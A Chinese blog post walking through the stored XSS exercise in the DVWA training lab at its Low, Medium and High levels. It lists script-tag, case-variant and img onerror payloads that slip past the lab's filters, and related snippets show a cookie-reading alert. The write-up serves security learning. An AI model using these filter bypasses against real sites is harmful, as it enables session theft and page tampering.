DVWA XSS(Stored)

最新推荐文章于 2024-07-12 19:20:52 发布
最新推荐文章于 2024-07-12 19:20:52 发布
阅读量132 收藏
点赞数
文章标签: xss 前端 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63774340/article/details/131584431
版权

LOW 

直接js脚本:<script>alert(1)</script>

 

 成功 换下一级

Medium

继续在message框输入

<script>alert(1)</script> 失败
<Script>alert(1)</Script> 失败
<scrscriptipt>alert(1)</scrscriptipt> 失败
<a herf=javascript:alert(1)> 失败
<img scr=1 οnclick=alert(1)> 失败
<svg οnclick=alert(1)> 失败

转换思路,去name框输入:

但是name框有长度限制,记得更改maxlength

<script>alert(1)</script> 失败

 <Script>alert(1)</Script> 成功 应该只是过滤了<script>,你们可以尝试其他的

High

前面中级已经不能在message框注入了,我们直接尝试name框

<script>alert(1)</script> 失败
<Script>alert(1)</Script> 失败
<scrscriptipt>alert(1)</scrscriptipt> 失败

尝试script之外的

<a herf=javascript:alert(1)> 失败

<img scr=1 οnclick=alert(1)> 也不行

那就切换事件

<img scr=1 οnerrοr=alert(/xxx/) > 搞定

 Impossible(不可能的) 应该进不去

H--E
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
DVWA XSS
部分学习记录
09-19 225
DOM Based Cross Site Scripting (XSS) low 打开是一个菜单选项,提交以后发现URL有参数,修改一下呢?成功了,那直接试一下xss脚本<script>alert(document.cookie);</script>,成功获取到cookie medium 构造代码<script>alert(document.cookie)</script>,没效果?应该是有过滤机制,试一下双写,还是不行,会不会是转义问题?直接利用URL编码
DVWA XSS Stored
m0_56107268的博客
04-30 179
LOW <?php if( isset( $_POST[ 'btnSign' ] ) ) { // Get input $message = trim( $_POST[ 'mtxMessage' ] ); $name = trim( $_POST[ 'txtName' ] ); // Sanitize message input $message = stripslashes( $message ); $message = ((isset(
Dvwa_XSS (Stored)
m0_56267052的博客
01-03 2317
(实验基础:有php语言和html语言基础) 1、low 在Name里构造恶意脚本,写完10个字符后发现在输输不进去,此时按ctrl+u(火狐,Microsoft Edge,谷歌这三款浏览器都可用此快捷方式打开网页源码)可以查看网页源码, 发现Name可输的最大长度为10,Message可输的最大长度为50 可以在Message里构造恶意脚本 因为是存储型XSS,为了防止前面的实验影响,所以需清空数据库。 点击: 2、medium 使用low等级构造的恶意脚本攻击时发
DVWA-XSS(Stored)
自强不息
01-15 412
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
xss-dvwa靶场详情
04-06
dvwa靶场中的xss漏洞详情
DVWA下的XSS
07-25
DVWA下的XSS
DVWA靶场搭建与使用
09-02
**DVWA靶场搭建与使用** DVWA(Damn Vulnerable Web Application)是一个开源的Web应用程序,专门为网络安全专业人员、开发人员和学生设计,用于学习和练习常见Web应用漏洞的识别和利用。它提供了多种安全漏洞的...
dvwa靶场,里面也有xss靶场
09-24
DVWA中的XSS靶场通常包含反射型XSS、存储型XSS和DOM型XSS三个部分,每个部分都有不同级别的难度,让用户逐步理解XSS的原理和防御方法。 2. **数据库连接配置** 在DVWA中,数据库连接信息位于`DVWA-master\config`...
DVWA Installation
08-15
它包含了各种常见Web应用漏洞,如SQL注入、跨站脚本(XSS)、文件包含漏洞等,是安全专业人士进行渗透测试和学习Web安全的实践平台。 在开始安装过程之前,你需要确保你的系统满足以下基本要求: 1. **操作系统**:...
XSS: 原理 反射型实例[入门]
最新发布
h1008685的博客
07-12 336
xss原理,结合实例讲解
OpenSNN推文:近期优质博客推荐汇总
opensnn的博客
07-12 193
国内个人博客站点众多,涵盖了技术、生活、艺术等多个领域。
更新商品前端接口编写
weixin_55639995的博客
07-12 145
那么在vue运行的时候,会加载所有的ref属性特征的元素还有组件。标签中ref的作用就是将 该组件注册到vue对象的ref属性中。使用插槽,那个scope就是代表着一行的数据。然后里面的选项遍历的是 js定义的数据。如果文字显示过多可以使用 文本隐藏显示。表单绑定还有表单数据的绑定。数据绑定使用的表单绑定状态。写form表单然后封装数据。状态的选择使用的是选择框。副标题使用的是文本域。状态页面使用,下拉框。富文本选择器使用组件。使用后端枚举类型去写。
Node多版本管理器NVM安装使用
GongWeiBuQi的博客
07-11 137
安装node很方便,只需要一条命令可以轻松切换node版本可以多版本node并存。
Javafx利用fxml变换场景的小细节
2301_80311013的博客
07-09 816
在这个代码中,在JavaFX中,FXMLLoader是用来加载FXML文件并将其转换为Java对象(例如控制器类)的工具。当您使用FXMLLoaderFXMLLoader在整个过程中,FXMLLoader是使用JavaFX的后台线程(也称为JavaFX线程)来执行这些操作的,这是为了保持UI线程的响应性。这意味着在用户界面(UI)线程中,您不会看到任何阻塞,即使FXMLLoader正在执行耗时的操作。当FXMLLoader完成加载并调用load()方法时,它会返回一个Parent。
一个使用Go语言和现代Web技术构建跨平台桌面应用程序开源项目
yunmoon的博客
07-10 966
Wails作为一个桥梁,连接强大的Go后端逻辑与丰富的Web前端界面,允许开发者利用两者的最佳特性来开发应用。
前端javascript中的排序算法之插入排序
峰会路转的博客
07-09 167
【代码】前端javascript中的排序算法之插入排序。
vue父子组件通信实现模糊搜索功能
全栈码农,专注java项目实战教程分享、大学生项目辅导开发讲解。
07-09 740
模糊搜索功能 每个网站都要用得到
Haproxy搭建Web群集
wkysdhr的博客
07-08 945
Haproxy 是目前比较流行的一种群集调度工具,同类群集调度工具有很多,如LVS 和Nginx。相比较而言,LVS 性能最好,但是搭建相对复杂;Nginx的upstream模块支持群集功能,但是对群集节点健康检查功能不强,高并发性能没有 Haproxy好。
dvwa xss restore
08-12
对于DVWA(Damn Vulnerable Web Application)中的XSS(跨站脚本攻击)漏洞的修复,您可以按照以下步骤进行操作: 1. 确保您已经安装了DVWA并启动了相应的服务器。 2. 登录到DVWA应用程序,并导航到XSS攻击页面。 3. 在XSS攻击页面中,输入一些恶意的脚本代码来触发XSS漏洞。 4. 检查并确认XSS漏洞已经成功触发。 5. 打开DVWA的源代码文件,并找到与XSS漏洞相关的代码段。 6. 修复XSS漏洞的方法通常是对用户输入进行适当的验证和过滤。您可以使用安全编码方法(如HTML编码或转义字符)来防止恶意脚本的执行。 7. 在修复代码后,保存并重新部署DVWA应用程序。 8. 再次登录到DVWA,并返回到XSS攻击页面。 9. 输入先前用于触发XSS漏洞的恶意脚本代码,以验证修复是否成功。 10. 如果成功修复,您将看到脚本不再执行,或者以安全的方式进行处理。 请注意,这是一个基本的修复过程,并且具体的步骤可能因DVWA的版本和配置而有所不同。在进行任何安全性修复之前,请确保您了解DVWAXSS漏洞的工作原理,并根据您的具体情况进行相应的操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值